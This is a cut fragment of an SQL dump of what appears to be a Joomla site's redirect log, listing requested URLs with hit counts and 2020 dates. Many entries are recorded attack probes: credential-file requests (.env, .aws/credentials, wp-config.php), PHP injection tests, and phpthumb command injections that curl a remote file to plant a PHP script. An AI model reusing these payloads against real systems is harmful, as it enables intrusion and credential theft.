12:46:51','0000-00-00 00:00:00',301),(23975,'http://3s-technologies.com.tr/tr/administrator/components/com_ekrishta/ekrishta.xml',NULL,'','',1,0,'2020-01-03 12:46:52','0000-00-00 00:00:00',301),(23976,'http://3s-technologies.com.tr/tr/administrator/components/com_ekrishta/config.xml',NULL,'','',1,0,'2020-01-03 12:46:52','0000-00-00 00:00:00',301),(23977,'http://3s-technologies.com.tr/tr/administrator/components/com_dtracker/com_dtracker.xml',NULL,'','',1,0,'2020-01-03 12:46:53','0000-00-00 00:00:00',301),(23978,'http://3s-technologies.com.tr/tr/administrator/components/com_dtracker/_dtracker.xml',NULL,'','',1,0,'2020-01-03 12:46:53','0000-00-00 00:00:00',301),(23979,'http://3s-technologies.com.tr/tr/administrator/components/com_dtracker/access.xml',NULL,'','',1,0,'2020-01-03 12:46:54','0000-00-00 00:00:00',301),(23980,'http://3s-technologies.com.tr/tr/administrator/components/com_dtracker/dtracker.xml',NULL,'','',1,0,'2020-01-03 12:46:54','0000-00-00 00:00:00',301),(23981,'http://3s-technologies.com.tr/tr/administrator/components/com_dtracker/config.xml',NULL,'','',1,0,'2020-01-03 12:46:55','0000-00-00 00:00:00',301),(23982,'http://3s-technologies.com.tr/tr/administrator/components/com_smartshoutbox/com_smartshoutbox.xml',NULL,'','',1,0,'2020-01-03 12:46:55','0000-00-00 00:00:00',301),(23983,'http://3s-technologies.com.tr/tr/administrator/components/com_smartshoutbox/_smartshoutbox.xml',NULL,'','',1,0,'2020-01-03 12:46:56','0000-00-00 00:00:00',301),(23984,'http://3s-technologies.com.tr/tr/administrator/components/com_smartshoutbox/access.xml',NULL,'','',1,0,'2020-01-03 12:46:56','0000-00-00 00:00:00',301),(23985,'http://3s-technologies.com.tr/tr/administrator/components/com_smartshoutbox/smartshoutbox.xml',NULL,'','',1,0,'2020-01-03 12:46:57','0000-00-00 00:00:00',301),(23986,'http://3s-technologies.com.tr/tr/administrator/components/com_smartshoutbox/config.xml',NULL,'','',1,0,'2020-01-03 12:46:58','0000-00-00 00:00:00',301),(23987,'http://3s-technologies.com.tr/tr/administrator/components/com_medialibrary/com_medialibrary.xml',NULL,'','',1,0,'2020-01-03 12:46:58','0000-00-00 00:00:00',301),(23988,'http://3s-technologies.com.tr/tr/administrator/components/com_medialibrary/_medialibrary.xml',NULL,'','',1,0,'2020-01-03 12:46:59','0000-00-00 00:00:00',301),(23989,'http://3s-technologies.com.tr/tr/administrator/components/com_medialibrary/access.xml',NULL,'','',1,0,'2020-01-03 12:46:59','0000-00-00 00:00:00',301),(23990,'http://3s-technologies.com.tr/tr/administrator/components/com_medialibrary/medialibrary.xml',NULL,'','',1,0,'2020-01-03 12:47:00','0000-00-00 00:00:00',301),(23991,'http://3s-technologies.com.tr/tr/administrator/components/com_medialibrary/config.xml',NULL,'','',1,0,'2020-01-03 12:47:00','0000-00-00 00:00:00',301),(23992,'http://3s-technologies.com.tr/tr/administrator/components/com_jticketing/com_jticketing.xml',NULL,'','',1,0,'2020-01-03 12:47:01','0000-00-00 00:00:00',301),(23993,'http://3s-technologies.com.tr/tr/administrator/components/com_jticketing/_jticketing.xml',NULL,'','',1,0,'2020-01-03 12:47:02','0000-00-00 00:00:00',301),(23994,'http://3s-technologies.com.tr/tr/administrator/components/com_jticketing/access.xml',NULL,'','',1,0,'2020-01-03 12:47:02','0000-00-00 00:00:00',301),(23995,'http://3s-technologies.com.tr/tr/administrator/components/com_jticketing/jticketing.xml',NULL,'','',1,0,'2020-01-03 12:47:03','0000-00-00 00:00:00',301),(23996,'http://3s-technologies.com.tr/tr/administrator/components/com_jticketing/config.xml',NULL,'','',1,0,'2020-01-03 12:47:03','0000-00-00 00:00:00',301),(23997,'http://3s-technologies.com.tr/tr/administrator/components/com_saxumpicker/com_saxumpicker.xml',NULL,'','',1,0,'2020-01-03 12:47:04','0000-00-00 00:00:00',301),(23998,'http://3s-technologies.com.tr/tr/administrator/components/com_saxumpicker/_saxumpicker.xml',NULL,'','',1,0,'2020-01-03 12:47:05','0000-00-00 00:00:00',301),(23999,'http://3s-technologies.com.tr/tr/administrator/components/com_saxumpicker/access.xml',NULL,'','',1,0,'2020-01-03 12:47:05','0000-00-00 00:00:00',301),(24000,'http://3s-technologies.com.tr/tr/administrator/components/com_saxumpicker/saxumpicker.xml',NULL,'','',1,0,'2020-01-03 12:47:06','0000-00-00 00:00:00',301),(24001,'http://3s-technologies.com.tr/tr/administrator/components/com_saxumpicker/config.xml',NULL,'','',1,0,'2020-01-03 12:47:06','0000-00-00 00:00:00',301),(24002,'http://3s-technologies.com.tr/tr/administrator/components/com_auctionfactory/com_auctionfactory.xml',NULL,'','',1,0,'2020-01-03 12:47:07','0000-00-00 00:00:00',301),(24003,'http://3s-technologies.com.tr/tr/administrator/components/com_auctionfactory/_auctionfactory.xml',NULL,'','',1,0,'2020-01-03 12:47:07','0000-00-00 00:00:00',301),(24004,'http://3s-technologies.com.tr/tr/administrator/components/com_auctionfactory/access.xml',NULL,'','',1,0,'2020-01-03 12:47:08','0000-00-00 00:00:00',301),(24005,'http://3s-technologies.com.tr/tr/administrator/components/com_auctionfactory/auctionfactory.xml',NULL,'','',1,0,'2020-01-03 12:47:08','0000-00-00 00:00:00',301),(24006,'http://3s-technologies.com.tr/tr/administrator/components/com_auctionfactory/config.xml',NULL,'','',1,0,'2020-01-03 12:47:09','0000-00-00 00:00:00',301),(24007,'http://3s-technologies.com.tr/tr/administrator/components/com_cwtags/com_cwtags.xml',NULL,'','',1,0,'2020-01-03 12:47:09','0000-00-00 00:00:00',301),(24008,'http://3s-technologies.com.tr/tr/administrator/components/com_cwtags/_cwtags.xml',NULL,'','',1,0,'2020-01-03 12:47:10','0000-00-00 00:00:00',301),(24009,'http://3s-technologies.com.tr/tr/administrator/components/com_cwtags/access.xml',NULL,'','',1,0,'2020-01-03 12:47:10','0000-00-00 00:00:00',301),(24010,'http://3s-technologies.com.tr/tr/administrator/components/com_cwtags/cwtags.xml',NULL,'','',1,0,'2020-01-03 12:47:11','0000-00-00 00:00:00',301),(24011,'http://3s-technologies.com.tr/tr/administrator/components/com_cwtags/config.xml',NULL,'','',1,0,'2020-01-03 12:47:11','0000-00-00 00:00:00',301),(24012,'http://3s-technologies.com.tr/tr/administrator/components/com_bookpro/com_bookpro.xml',NULL,'','',1,0,'2020-01-03 12:47:12','0000-00-00 00:00:00',301),(24013,'http://3s-technologies.com.tr/tr/administrator/components/com_bookpro/_bookpro.xml',NULL,'','',1,0,'2020-01-03 12:47:13','0000-00-00 00:00:00',301),(24014,'http://3s-technologies.com.tr/tr/administrator/components/com_bookpro/access.xml',NULL,'','',1,0,'2020-01-03 12:47:13','0000-00-00 00:00:00',301),(24015,'http://3s-technologies.com.tr/tr/administrator/components/com_bookpro/bookpro.xml',NULL,'','',1,0,'2020-01-03 12:47:14','0000-00-00 00:00:00',301),(24016,'http://3s-technologies.com.tr/tr/administrator/components/com_bookpro/config.xml',NULL,'','',1,0,'2020-01-03 12:47:14','0000-00-00 00:00:00',301),(24017,'http://3s-technologies.com.tr/tr/administrator/components/com_jimtawl/com_jimtawl.xml',NULL,'','',1,0,'2020-01-03 12:47:15','0000-00-00 00:00:00',301),(24018,'http://3s-technologies.com.tr/tr/administrator/components/com_jimtawl/_jimtawl.xml',NULL,'','',1,0,'2020-01-03 12:47:15','0000-00-00 00:00:00',301),(24019,'http://3s-technologies.com.tr/tr/administrator/components/com_jimtawl/access.xml',NULL,'','',1,0,'2020-01-03 12:47:16','0000-00-00 00:00:00',301),(24020,'http://3s-technologies.com.tr/tr/administrator/components/com_jimtawl/jimtawl.xml',NULL,'','',1,0,'2020-01-03 12:47:16','0000-00-00 00:00:00',301),(24021,'http://3s-technologies.com.tr/tr/administrator/components/com_jimtawl/config.xml',NULL,'','',1,0,'2020-01-03 12:47:17','0000-00-00 00:00:00',301),(24022,'http://3s-technologies.com.tr/tr/administrator/components/com_vreview/com_vreview.xml',NULL,'','',1,0,'2020-01-03 12:47:18','0000-00-00 00:00:00',301),(24023,'http://3s-technologies.com.tr/tr/administrator/components/com_vreview/_vreview.xml',NULL,'','',1,0,'2020-01-03 12:47:18','0000-00-00 00:00:00',301),(24024,'http://3s-technologies.com.tr/tr/administrator/components/com_vreview/access.xml',NULL,'','',1,0,'2020-01-03 12:47:19','0000-00-00 00:00:00',301),(24025,'http://3s-technologies.com.tr/tr/administrator/components/com_vreview/vreview.xml',NULL,'','',1,0,'2020-01-03 12:47:19','0000-00-00 00:00:00',301),(24026,'http://3s-technologies.com.tr/tr/administrator/components/com_vreview/config.xml',NULL,'','',1,0,'2020-01-03 12:47:20','0000-00-00 00:00:00',301),(24027,'http://3s-technologies.com.tr/tr/administrator/components/com_advertisementboard/com_advertisementboard.xml',NULL,'','',1,0,'2020-01-03 12:47:20','0000-00-00 00:00:00',301),(24028,'http://3s-technologies.com.tr/tr/administrator/components/com_advertisementboard/_advertisementboard.xml',NULL,'','',1,0,'2020-01-03 12:47:21','0000-00-00 00:00:00',301),(24029,'http://3s-technologies.com.tr/tr/administrator/components/com_advertisementboard/access.xml',NULL,'','',1,0,'2020-01-03 12:47:21','0000-00-00 00:00:00',301),(24030,'http://3s-technologies.com.tr/tr/administrator/components/com_advertisementboard/advertisementboard.xml',NULL,'','',1,0,'2020-01-03 12:47:22','0000-00-00 00:00:00',301),(24031,'http://3s-technologies.com.tr/tr/administrator/components/com_advertisementboard/config.xml',NULL,'','',1,0,'2020-01-03 12:47:22','0000-00-00 00:00:00',301),(24032,'http://3s-technologies.com.tr/tr/plugins/content/cwattachments/cwattachments/helpers/download.php',NULL,'','',1,0,'2020-01-03 12:47:23','0000-00-00 00:00:00',301),(24033,'http://www.3s-technologies.com.tr/tr/&nx=207&ny=25&clkt=25&bg=!kyilkdbykfssanusqkscaaabgviaaabgmqfz2xx9nwkk0nhcxnhi4jo-y6a_udhlnfbxdhwpeqng-ulkpouk45trmoczlugxib8mabmvcjlsbzt4arq9nzqgwd90m-npp5_b0omazre8dkf2tcipzrfrzx_jblkjzupf-n7rmcjxuazvnukz2izl14aowjpj4rbud8er4ugq9oqnu9v0ktgiytos41qmwqppvjr0mt9yl1cehm0xz58wr6bxjgpo1qeyxqzhszi-_saxqjm1sxgkickeazll3xcj1i4keqjjif-pvdyfek5jpdczvfigvg9izoialy1h8eljoj9z3pqvhnc9qteiuapx_0hkm2cdvbwkc64nwv3tdhljgk8fhfa0wrg4kdknqnhzweorpqpihivwt1wdpnib__rokbtm5u--a-ujmwmr_vae27ikkrjcztclrj3vcj1hwo7rljzmiyrtdwvks0_tgvphosnhsms5yj66gwxv5afdyqt8uremzozi0fedejfaism',NULL,'https://www.google.com.tr/','',1,0,'2020-01-04 08:24:29','0000-00-00 00:00:00',301),(24034,'http://3s-technologies.com.tr/tr/.bitcoin',NULL,'http://3s-technologies.com.tr/.bitcoin/','',1,0,'2020-01-05 21:25:03','0000-00-00 00:00:00',301),(24035,'http://www.3s-technologies.com.tr/tr/dailpmskggjst.html',NULL,'','',1,0,'2020-01-06 06:14:23','0000-00-00 00:00:00',301),(24036,'https://3s-technologies.com.tr/en/robots.txt',NULL,'','',2026,0,'2020-01-06 10:00:15','0000-00-00 00:00:00',301),(24037,'https://www.3s-technologies.com.tr/en/robots.txt',NULL,'','',160,0,'2020-01-06 10:04:37','0000-00-00 00:00:00',301),(24038,'https://www.3s-technologies.com.tr/tr/images/slideshow/0-cm602_cm101.jpg',NULL,'','',5,0,'2020-01-08 02:09:32','0000-00-00 00:00:00',301),(24039,'https://www.3s-technologies.com.tr/tr/images/urunler/t_mi300.jpg',NULL,'','',91,0,'2020-01-09 01:03:46','0000-00-00 00:00:00',301),(24040,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/slideshow/0-cm602_cm101.jpg',NULL,'','',6,0,'2020-01-09 18:13:44','0000-00-00 00:00:00',301),(24041,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-categories/73-park-site/photo-gallery/scenery/64-blue-mountain-rain-forest',NULL,'','',1,0,'2020-01-13 03:50:06','0000-00-00 00:00:00',301),(24042,'http://www.3s-technologies.com.tr/tr/yrlxhxkjg.html',NULL,'','',1,0,'2020-01-13 06:06:27','0000-00-00 00:00:00',301),(24043,'http://3s-technologies.com.tr/tr//adminer.php',NULL,'','',6,0,'2020-01-13 08:37:47','0000-00-00 00:00:00',301),(24044,'http://3s-technologies.com.tr/tr/wszvaynwvwm.html',NULL,'','',1,0,'2020-01-14 10:55:06','0000-00-00 00:00:00',301),(24045,'http://3s-technologies.com.tr/tr/backup/wp-admin',NULL,'http://3s-technologies.com.tr/','',26,0,'2020-01-22 15:37:28','0000-00-00 00:00:00',301),(24046,'http://3s-technologies.com.tr/cache/accesson.php',NULL,'','',3,0,'2020-01-23 02:45:03','0000-00-00 00:00:00',301),(24047,'http://3s-technologies.com.tr/avtogear63_ru_cron.php',NULL,'','',2,0,'2020-01-23 15:59:12','0000-00-00 00:00:00',301),(24048,'http://3s-technologies.com.tr/tr//wp-login.php',NULL,'','',24,0,'2020-01-23 20:56:40','0000-00-00 00:00:00',301),(24049,'http://3s-technologies.com.tr/tr/wp/wp-admin',NULL,'http://3s-technologies.com.tr/','',25,0,'2020-01-24 00:55:58','0000-00-00 00:00:00',301),(24050,'http://3s-technologies.com.tr/tr/blog/wp-admin',NULL,'http://3s-technologies.com.tr/','',3,0,'2020-01-24 01:08:23','0000-00-00 00:00:00',301),(24051,'http://3s-technologies.com.tr/stats.php',NULL,'','',7,0,'2020-01-24 03:48:33','0000-00-00 00:00:00',301),(24052,'http://3s-technologies.com.tr/blackhat.php',NULL,'','',6,0,'2020-01-24 03:48:33','0000-00-00 00:00:00',301),(24053,'http://3s-technologies.com.tr/content-post.php',NULL,'','',4,0,'2020-01-24 03:48:37','0000-00-00 00:00:00',301),(24054,'http://3s-technologies.com.tr/assets/images/pas.php',NULL,'','',4,0,'2020-01-24 03:55:35','0000-00-00 00:00:00',301),(24055,'http://3s-technologies.com.tr/pas.php',NULL,'','',4,0,'2020-01-24 04:27:53','0000-00-00 00:00:00',301),(24056,'http://3s-technologies.com.tr/jss.php',NULL,'','',4,0,'2020-01-24 05:01:51','0000-00-00 00:00:00',301),(24057,'http://3s-technologies.com.tr/administrator/includes/toolbar.php',NULL,'','',1,0,'2020-01-24 08:35:44','0000-00-00 00:00:00',301),(24058,'http://3s-technologies.com.tr/administrator/language/ru-ru/ru-ru.localise.php',NULL,'','',2,0,'2020-01-24 09:38:13','0000-00-00 00:00:00',301),(24059,'http://3s-technologies.com.tr/administrator/components/com_admin/postinstall/phpversion.php',NULL,'','',2,0,'2020-01-24 20:49:00','0000-00-00 00:00:00',301),(24060,'https://3s-technologies.com.tr/en/images/ddm/reflow',NULL,'','',9,0,'2020-01-25 14:58:35','0000-00-00 00:00:00',301),(24061,'http://www.3s-technologies.com.tr/tr/dhhcavemgxhhhmyi.html',NULL,'','',1,0,'2020-01-26 14:31:07','0000-00-00 00:00:00',301),(24062,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/npm-detail?tmpl=component&print=1',NULL,'','',1,0,'2020-01-27 01:07:45','0000-00-00 00:00:00',301),(24063,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/npm-detail?tmpl=component',NULL,'','',1,0,'2020-01-27 04:42:46','0000-00-00 00:00:00',301),(24064,'http://3s-technologies.com.tr/en/tmp/cu.php?qesnbunczligyuaitluohzkxfcamtluzimxqakqrrigpalolka=die(md5(435345));',NULL,'3s-technologies.com.tr','',3,0,'2020-01-27 06:52:47','0000-00-00 00:00:00',301),(24065,'http://3s-technologies.com.tr/en/cache/cu.php?qesnbunczligyuaitluohzkxfcamtluzimxqakqrrigpalolka=die(md5(435345));',NULL,'3s-technologies.com.tr','',3,0,'2020-01-27 06:53:35','0000-00-00 00:00:00',301),(24066,'http://3s-technologies.com.tr/en/logs/cu.php?qesnbunczligyuaitluohzkxfcamtluzimxqakqrrigpalolka=die(md5(435345));',NULL,'3s-technologies.com.tr','',3,0,'2020-01-27 06:54:53','0000-00-00 00:00:00',301),(24067,'http://www.3s-technologies.com.tr/tr/ ‎',NULL,'','',1,0,'2020-01-27 11:37:07','0000-00-00 00:00:00',301),(24068,'http://3s-technologies.com.tr/tr/jlvykeblesfdpj.html',NULL,'','',1,0,'2020-01-27 14:27:54','0000-00-00 00:00:00',301),(24069,'http://3s-technologies.com.tr/tr/database/print.css',NULL,'','',2,0,'2020-01-27 17:45:35','0000-00-00 00:00:00',301),(24070,'https://3s-technologies.com.tr/tr/database/print.css',NULL,'','',1,0,'2020-01-27 17:45:36','0000-00-00 00:00:00',301),(24071,'http://3s-technologies.com.tr/tr/pma/print.css',NULL,'','',2,0,'2020-01-27 17:45:36','0000-00-00 00:00:00',301),(24072,'https://3s-technologies.com.tr/tr/pma/print.css',NULL,'','',1,0,'2020-01-27 17:45:37','0000-00-00 00:00:00',301),(24073,'http://3s-technologies.com.tr/tr/phpmyadmin/print.css',NULL,'','',4,0,'2020-01-27 17:45:38','0000-00-00 00:00:00',301),(24074,'https://3s-technologies.com.tr/tr/phpmyadmin/print.css',NULL,'','',2,0,'2020-01-27 17:45:38','0000-00-00 00:00:00',301),(24075,'http://3s-technologies.com.tr/tr/myadmin/print.css',NULL,'','',2,0,'2020-01-27 17:45:39','0000-00-00 00:00:00',301),(24076,'https://3s-technologies.com.tr/tr/myadmin/print.css',NULL,'','',1,0,'2020-01-27 17:45:40','0000-00-00 00:00:00',301),(24077,'http://3s-technologies.com.tr/tr/mysql/print.css',NULL,'','',2,0,'2020-01-27 17:45:42','0000-00-00 00:00:00',301),(24078,'https://3s-technologies.com.tr/tr/mysql/print.css',NULL,'','',1,0,'2020-01-27 17:45:43','0000-00-00 00:00:00',301),(24079,'http://3s-technologies.com.tr/en/app-ads.txt',NULL,'','',3,0,'2020-01-29 06:32:12','0000-00-00 00:00:00',301),(24080,'http://3s-technologies.com.tr/tr/images/cms.php',NULL,'','',1,0,'2020-01-29 18:20:24','0000-00-00 00:00:00',301),(24081,'http://3s-technologies.com.tr/tr/tmp/cms.php',NULL,'','',1,0,'2020-01-29 18:20:25','0000-00-00 00:00:00',301),(24082,'http://3s-technologies.com.tr/tr/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg; curl \'http://www.sanfordbarrows.com/wp-includes/images/blanks.gif\' -o phpthumb.xml.php; &phpthumbdebug=9',NULL,'','',2,0,'2020-01-30 22:45:46','0000-00-00 00:00:00',301),(24083,'http://3s-technologies.com.tr/tr/thumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg; curl \'http://www.sanfordbarrows.com/wp-includes/images/blanks.gif\' -o phpthumb.xml.php; &phpthumbdebug=9',NULL,'','',1,0,'2020-01-30 22:45:47','0000-00-00 00:00:00',301),(24084,'http://3s-technologies.com.tr/tr/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin',NULL,'','',3,0,'2020-01-30 22:45:48','0000-00-00 00:00:00',301),(24085,'http://3s-technologies.com.tr/tr/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg; curl \'http://www.sanfordbarrows.com/wp-includes/images/blanks.gif\' -o phpthumb.xml.php; &phpthumbdebug=9',NULL,'','',1,0,'2020-01-30 22:45:48','0000-00-00 00:00:00',301),(24086,'http://3s-technologies.com.tr/tr/staging/wp-admin',NULL,'http://3s-technologies.com.tr/','',2,0,'2020-01-31 12:08:04','0000-00-00 00:00:00',301),(24087,'http://3s-technologies.com.tr/tr/site/wp-admin',NULL,'http://3s-technologies.com.tr/','',16,0,'2020-01-31 12:08:57','0000-00-00 00:00:00',301),(24088,'http://3s-technologies.com.tr/tr/temp/wp-admin',NULL,'http://3s-technologies.com.tr/','',1,0,'2020-01-31 12:09:20','0000-00-00 00:00:00',301),(24089,'http://3s-technologies.com.tr/tr/dev/wp-admin',NULL,'http://3s-technologies.com.tr/','',1,0,'2020-01-31 12:09:40','0000-00-00 00:00:00',301),(24090,'http://mail.3s-technologies.com.tr/tr/.env',NULL,'','',14,0,'2020-01-31 14:25:04','0000-00-00 00:00:00',301),(24091,'http://www.3s-technologies.com.tr/tr/.env',NULL,'','',51,0,'2020-01-31 16:41:55','0000-00-00 00:00:00',301),(24092,'http://3s-technologies.com.tr/tr/wp-config.php',NULL,'','',54,0,'2020-02-01 12:14:35','0000-00-00 00:00:00',301),(24093,'http://www.3s-technologies.com.tr/tr/.aws/credentials',NULL,'','',3,0,'2020-02-01 14:23:30','0000-00-00 00:00:00',301),(24094,'http://mail.3s-technologies.com.tr/tr/.aws/credentials',NULL,'','',3,0,'2020-02-01 14:31:51','0000-00-00 00:00:00',301),(24095,'http://3s-technologies.com.tr/tr/2020/wp-login.php',NULL,'http://3s-technologies.com.tr//2020/wp-login.php','',3,0,'2020-02-01 20:36:09','0000-00-00 00:00:00',301),(24096,'http://3s-technologies.com.tr/tr/old/wp-login.php',NULL,'http://3s-technologies.com.tr//old/wp-login.php','',2,0,'2020-02-02 01:39:24','0000-00-00 00:00:00',301),(24097,'http://www.3s-technologies.com.tr/tr/ziwnucfxlei.html',NULL,'','',1,0,'2020-02-02 06:53:32','0000-00-00 00:00:00',301),(24098,'http://3s-technologies.com.tr/tr/wordpress/wp-admin',NULL,'http://3s-technologies.com.tr/','',45,0,'2020-02-02 13:50:12','0000-00-00 00:00:00',301),(24099,'http://3s-technologies.com.tr/en/component/k2/item/1',NULL,'','',1,0,'2020-02-02 14:42:47','0000-00-00 00:00:00',301),(24100,'http://www.3s-technologies.com.tr/tr//admin',NULL,'','',1,0,'2020-02-02 19:29:15','0000-00-00 00:00:00',301),(24101,'http://www.3s-technologies.com.tr/tr//components/com_virtuemart/assets/js/vmsite.js?vmver=d7768473',NULL,'','',1,0,'2020-02-02 19:29:15','0000-00-00 00:00:00',301),(24102,'http://www.3s-technologies.com.tr/tr//templates/beez5/javascript/hide.js',NULL,'','',1,0,'2020-02-02 19:29:15','0000-00-00 00:00:00',301),(24103,'http://www.3s-technologies.com.tr/tr//components/com_virtuemart/assets/js/vmprices.js?vmver=d7768473',NULL,'','',1,0,'2020-02-02 19:29:15','0000-00-00 00:00:00',301),(24104,'http://www.3s-technologies.com.tr/tr//media/djextensions/jquery-easing/jquery.easing.min.js',NULL,'','',1,0,'2020-02-02 19:29:15','0000-00-00 00:00:00',301),(24105,'http://www.3s-technologies.com.tr/tr//modules/mod_djimageslider/assets/js/slider.js?v=2.0.4.stable',NULL,'','',1,0,'2020-02-02 19:29:15','0000-00-00 00:00:00',301),(24106,'http://www.3s-technologies.com.tr/tr//media/system/js/mootools-more.js?590071d26b532c39cbb64387ee168fdb',NULL,'','',1,0,'2020-02-02 19:29:15','0000-00-00 00:00:00',301),(24107,'http://www.3s-technologies.com.tr/tr//templates/beez5/javascript/md_stylechanger.js',NULL,'','',1,0,'2020-02-02 19:29:15','0000-00-00 00:00:00',301),(24108,'http://www.3s-technologies.com.tr/tr//media/system/js/mootools-core.js?590071d26b532c39cbb64387ee168fdb',NULL,'','',1,0,'2020-02-02 19:29:15','0000-00-00 00:00:00',301),(24109,'http://www.3s-technologies.com.tr/tr//modules/mod_virtuemart_cart/assets/js/update_cart.js?vmver=d7768473',NULL,'','',1,0,'2020-02-02 19:29:15','0000-00-00 00:00:00',301),(24110,'http://www.3s-technologies.com.tr/tr//media/jui/js/jquery-noconflict.js?590071d26b532c39cbb64387ee168fdb',NULL,'','',1,0,'2020-02-02 19:29:17','0000-00-00 00:00:00',301),(24111,'http://www.3s-technologies.com.tr/tr//media/jui/js/jquery-migrate.min.js?590071d26b532c39cbb64387ee168fdb',NULL,'','',1,0,'2020-02-02 19:29:17','0000-00-00 00:00:00',301),(24112,'http://www.3s-technologies.com.tr/tr//media/system/js/caption.js?590071d26b532c39cbb64387ee168fdb',NULL,'','',1,0,'2020-02-02 19:29:17','0000-00-00 00:00:00',301),(24113,'http://www.3s-technologies.com.tr/tr//media/system/js/core.js?590071d26b532c39cbb64387ee168fdb',NULL,'','',1,0,'2020-02-02 19:29:17','0000-00-00 00:00:00',301),(24114,'http://www.3s-technologies.com.tr/tr//media/jui/js/jquery.min.js?590071d26b532c39cbb64387ee168fdb',NULL,'','',1,0,'2020-02-02 19:29:17','0000-00-00 00:00:00',301),(24115,'http://www.3s-technologies.com.tr/tr//tr/pcb-prototip-prototyping',NULL,'','',1,0,'2020-02-02 19:29:17','0000-00-00 00:00:00',301),(24116,'http://www.3s-technologies.com.tr/tr//tr/dalga-lehimleme',NULL,'','',1,0,'2020-02-02 19:29:17','0000-00-00 00:00:00',301),(24117,'http://www.3s-technologies.com.tr/tr//en/',NULL,'','',1,0,'2020-02-02 19:29:19','0000-00-00 00:00:00',301),(24118,'http://www.3s-technologies.com.tr/tr//tr/kart-ueretim-teknolojileri',NULL,'','',1,0,'2020-02-02 19:29:19','0000-00-00 00:00:00',301),(24119,'http://www.3s-technologies.com.tr/tr//tr/kursunsuz-lehim',NULL,'','',1,0,'2020-02-02 19:29:19','0000-00-00 00:00:00',301),(24120,'http://www.3s-technologies.com.tr/tr//tr/video',NULL,'','',1,0,'2020-02-02 19:29:20','0000-00-00 00:00:00',301),(24121,'http://www.3s-technologies.com.tr/tr//tr/iletisim',NULL,'','',1,0,'2020-02-02 19:29:20','0000-00-00 00:00:00',301),(24122,'http://www.3s-technologies.com.tr/tr//tr/ana-sayfa',NULL,'','',1,0,'2020-02-02 19:29:21','0000-00-00 00:00:00',301),(24123,'http://www.3s-technologies.com.tr/tr//components/com_virtuemart/assets/js/chosen.jquery.min.js?vmver=d7768473',NULL,'','',1,0,'2020-02-02 19:29:22','0000-00-00 00:00:00',301),(24124,'https://www.3s-technologies.com.tr/en/images/global/lfs',NULL,'','',21,0,'2020-02-03 01:18:42','0000-00-00 00:00:00',301),(24125,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux',NULL,'','',3,0,'2020-02-03 04:02:28','0000-00-00 00:00:00',301),(24126,'http://3s-technologies.com.tr/en/stats',NULL,'','',2,0,'2020-02-05 01:14:20','0000-00-00 00:00:00',301),(24127,'http://3s-technologies.com.tr/en/webalizer',NULL,'','',2,0,'2020-02-05 01:14:20','0000-00-00 00:00:00',301),(24128,'http://3s-technologies.com.tr/en/plesk-stat/webstat',NULL,'','',1,0,'2020-02-05 01:14:20','0000-00-00 00:00:00',301),(24129,'https://mail.3s-technologies.com.tr/tr/wp-login.php',NULL,'http://www.google.com.hk','',11,0,'2020-02-05 21:29:52','0000-00-00 00:00:00',301),(24130,'http://3s-technologies.com.tr/avtogear86_ru_cron.php',NULL,'','',3,0,'2020-02-06 01:23:10','0000-00-00 00:00:00',301),(24131,'https://3s-technologies.com.tr/en/images/global/lfs',NULL,'','',14,0,'2020-02-06 06:46:07','0000-00-00 00:00:00',301),(24132,'http://www.3s-technologies.com.tr/en/__media__/js/netsoltrademark.php?d=pills999megausa.com',NULL,'','',2,0,'2020-02-06 19:51:47','0000-00-00 00:00:00',301),(24133,'http://3s-technologies.com.tr/en/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',1,0,'2020-02-07 19:26:33','0000-00-00 00:00:00',301),(24134,'http://3s-technologies.com.tr/tr/telerik.web.ui.webresource.axd?type=rau',NULL,'','',9,0,'2020-02-07 23:59:07','0000-00-00 00:00:00',301),(24135,'https://www.3s-technologies.com.tr/en/images/ddm/reflow',NULL,'','',15,0,'2020-02-08 06:46:00','0000-00-00 00:00:00',301),(24136,'http://www.3s-technologies.com.tr/tr/grechdyl.html',NULL,'','',1,0,'2020-02-09 08:46:24','0000-00-00 00:00:00',301),(24137,'https://mail.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping',NULL,'','',4,0,'2020-02-09 16:18:19','0000-00-00 00:00:00',301),(24138,'http://3s-technologies.com.tr/tr/ixmndyqtjwml.html',NULL,'','',1,0,'2020-02-10 09:05:29','0000-00-00 00:00:00',301),(24139,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/index.php/en/using-joomla/extensions/components/users-component/index.php/en/using-joomla/extensions/components/users-component/index.php/en/using-joomla/extensions/components/users-component/registration-form',NULL,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/registration-form','',1,0,'2020-02-10 19:49:29','0000-00-00 00:00:00',301),(24140,'https://3s-technologies.com.tr/en/components/com_virtuemart/assets/css/chosen-sprite@2x.png',NULL,'','',129,0,'2020-02-10 22:48:32','0000-00-00 00:00:00',301),(24141,'http://www.3s-technologies.com.tr/tr/images/cnc/video/acrylic-sign-piano.mp4',NULL,'http://www.3s-technologies.com.tr/tr/akrilik-i%C5%9Fleme-acrylic-processing/akrilik-oyma-acrylic-engraving','',2,0,'2020-02-11 15:11:23','0000-00-00 00:00:00',301),(24142,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/wood-processing-ahşap-işleme',NULL,'','',37,0,'2020-02-11 16:17:51','0000-00-00 00:00:00',301),(24143,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/akrilik-işleme-acrylic-processing',NULL,'','',60,0,'2020-02-12 03:46:38','0000-00-00 00:00:00',301),(24144,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/aluminyum-işleme-aluminum-processing',NULL,'','',66,0,'2020-02-12 03:47:06','0000-00-00 00:00:00',301),(24145,'https://3s-technologies.com.tr/en/images/urunler/t_mi300.jpg',NULL,'','',53,0,'2020-02-12 09:46:15','0000-00-00 